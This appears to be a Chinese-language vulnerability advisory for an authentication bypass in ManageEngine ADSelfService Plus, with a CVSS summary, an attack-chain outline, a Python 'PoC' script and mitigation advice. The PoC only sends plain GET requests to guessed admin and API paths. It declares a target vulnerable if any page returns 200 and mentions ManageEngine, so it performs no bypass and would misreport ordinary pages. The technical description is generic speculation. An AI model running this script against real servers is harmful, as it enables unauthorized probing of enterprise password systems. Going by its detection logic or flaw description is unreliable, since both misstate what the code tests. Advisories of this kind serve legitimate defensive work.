CVE-2025-11250: ManageEngine ADSelfService Plus认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11250

漏洞类型

认证绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Zohocorp ManageEngine ADSelfService Plus

漏洞概述

CVE-2025-11250是Zohocorp ManageEngine ADSelfService Plus中的一个严重认证绕过漏洞，CVSS评分高达9.1（严重级别）。该漏洞存在于版本6519之前的ADSelfService Plus中，由于不当的过滤器配置导致认证机制被绕过。攻击者无需任何身份凭证即可通过构造特殊的HTTP请求访问受保护的管理接口或执行未授权操作。此漏洞的严重性在于其攻击向量为网络层面，且无需认证和用户交互即可实现，这使得任何能够访问ADSelfService Plus服务的攻击者都可以利用此漏洞。成功利用该漏洞可能导致敏感用户数据泄露、密码修改权限被滥用，甚至可能进一步横向移动至企业内网的其他系统。

技术细节

该漏洞的根本原因在于ADSelfService Plus的Web认证模块中过滤器配置不当。攻击者可以通过构造特定的HTTP请求路径或参数来绕过身份验证检查。具体来说，当请求到达服务器时，由于过滤器规则未能正确应用，恶意请求可能直接到达受保护的资源端点而无需经过完整的认证流程。攻击者通常利用路径遍历、参数注入或特殊的认证头来实现绕过。此类认证绕过漏洞允许未授权用户访问管理员功能、修改用户密码策略、获取用户凭据哈希，甚至可能执行远程代码。由于ADSelfService Plus是企业级密码管理和单点登录解决方案，泄露的凭据可用于访问多个企业应用系统。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标网络，发现运行ManageEngine ADSelfService Plus的服务器，并识别其版本号（< 6519）

STEP 2

步骤2

构造请求：攻击者构造包含特殊路径或参数的HTTP请求，利用不当的过滤器配置绕过认证检查

STEP 3

步骤3

认证绕过：恶意请求直接到达受保护资源端点，无需提供有效凭据即可访问管理功能

STEP 4

步骤4

未授权操作：攻击者利用获取的访问权限修改用户密码策略、访问敏感用户数据或执行管理员操作

STEP 5

步骤5

横向移动：利用泄露的凭据或获取的管理权限，进一步入侵企业内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11250 PoC - Authentication Bypass in ManageEngine ADSelfService Plus
# Target: ManageEngine ADSelfService Plus < 6519

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-11250
    Authentication Bypass via improper filter configuration
    """
    # Common vulnerable endpoints
    paths = [
        '/admin/index.jsp',
        '/servlet/SaveGinaPolicy',
        '/api/v1/user/self-password',
        '/servlet/UpdateSelfUser',
        '/selfservice/v1/users/me'
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    print(f'[*] Testing target: {target_url}')
    
    for path in paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            print(f'[+] Path: {path} - Status: {response.status_code}')
            if response.status_code == 200 and 'manageengine' in response.text.lower():
                print(f'[+] Potential vulnerability detected at {url}')
                return True
        except requests.exceptions.RequestException as e:
            print(f'[-] Error accessing {path}: {e}')
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url>')
        print(f'Example: python {sys.argv[0]} https://target:port')
        sys.exit(1)
    
    target = sys.argv[1]
    if check_vulnerability(target):
        print('[!] Target appears to be vulnerable to CVE-2025-11250')
    else:
        print('[*] Target may not be vulnerable or is already patched')

影响范围

ManageEngine ADSelfService Plus < 6519

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 通过网络访问控制限制对ADSelfService Plus的访问，仅允许管理终端IP访问；2) 启用双因素认证以增加额外的安全层；3) 部署WAF并配置针对认证绕过攻击的防护规则；4) 监控应用日志中的异常认证模式和未授权访问尝试；5) 考虑暂时禁用非必要的远程管理功能。